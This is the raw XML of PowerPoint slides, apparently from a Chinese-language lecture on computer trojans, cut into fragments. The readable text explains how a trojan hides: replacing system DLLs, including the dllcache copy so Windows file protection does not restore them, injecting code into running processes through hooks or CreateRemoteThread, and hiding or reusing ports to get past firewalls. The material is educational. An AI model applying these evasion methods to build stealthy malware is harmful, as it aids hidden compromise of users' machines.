                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8704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8704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87046">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>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87046">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="87046">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="87046">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="87046">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87046">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="87046">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="87046">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8704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6" grpId="0" uiExpand="1"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p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）替换系统驱动或系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DLL</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89091" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="611188" y="1468438"/>
            <a:ext cx="7772400" cy="4622646"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>这种方法与一般方法不同，它基本上摆脱了原有的木马模式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>---</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>监听端口，而采用替代系统功能的方法（改写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>虚拟设备驱动程序</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>vxd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>或动态链接库</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DLL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件），木马会将修改后的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DLL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>替换系统已知的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DLL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，并对所有的函数调用进行过滤。</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p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）替换系统驱动或系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DLL</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90115" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="649288" y="1487487"/>
            <a:ext cx="7772400" cy="4559351"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4400"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>攻击者的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>DLL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>文件一般包括有函数转发器。在处理函数调用时，对于系统正常的调用请求，它就把请求直接转发给被替换的系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>DLL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>进行处理；如果是约定的相应操作</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>事先约定好的特殊情况</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>，则按照约定完成所请求的功能。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4400"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>这样做的好处是没有增加新的文件，不需要打开新的端口，没有新的进程，使用常规的方法监测不到它。</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90115">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="90115">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90115">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90115">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90115">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="90115">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90115">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901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5" grpId="0" uiExpand="1"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zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）替换系统驱动或系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DLL</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="91139" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548814" y="1353973"/>
            <a:ext cx="8059158" cy="4731517"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>注意：现在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>对重要的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>DLL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>有保护机制</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Windows system32</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>目录下有一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>dllcache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的目录，下面存放着大量</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DLL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件和重要的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>系统一旦发现被保护的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DLL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件被改动，它就会自动从</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>dllcache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中恢复这个文件。所以在替换系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DLL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件之前必须先把</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>dllcache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>目录下的对应的系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DLL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件也替换掉。系统重装、安装补丁、升级系统或者检查数字签名等均会使这种木马种植方法失效。</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zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）动态嵌入技术</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92163" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="515938" y="1411288"/>
            <a:ext cx="7772400" cy="4800326"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="3900"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>另一种利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>DLL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>隐藏木马的方法是动态嵌入技术：将木马程序代码嵌入到正在运行的进程中</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="3900"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>系统中的每个进程都有自己的私有内存空间，一般不允许别的进程对其进行操作。但可以通过窗口</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（钩子函数）、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>挂接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>远程线程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(CreateRemoteThread)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>等方法进入并操作进程的私有空间，使木马的核心代码运行于其它进程的内存空间。这种方法比</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DLL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>替换技术有更好的隐藏性。</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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）进程隐藏小结</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1150938" y="1772991"/>
            <a:ext cx="6115926" cy="3677143"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2043291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p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、通信隐藏</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86019" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="519113" y="1447800"/>
            <a:ext cx="7430268" cy="4267200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>端口隐藏</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：现在大部分木马一般在控制主机后会在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1024</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>以上不易发现的高端口上驻留；有一些木马也会选择一些常用的端口，如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>23</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="4100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>有些木马利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>端口时，在收到正常的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>请求仍然把它交与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>服务器处理，只有收到一些特殊约定的数据包后，才调用木马程序。</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43048" y="1475336"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>端口复用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>是重复使用系统中已经开启的端口，从而绕过防火墙的拦截。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、通信隐藏</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1614012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2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>计算机木马</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11270" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="534988" y="1430337"/>
            <a:ext cx="7772400" cy="4544793"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>RFC1244 (Request for Comments : 1244) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中是这样描述木马的</a:t>
            </a:r>
            <a:r>
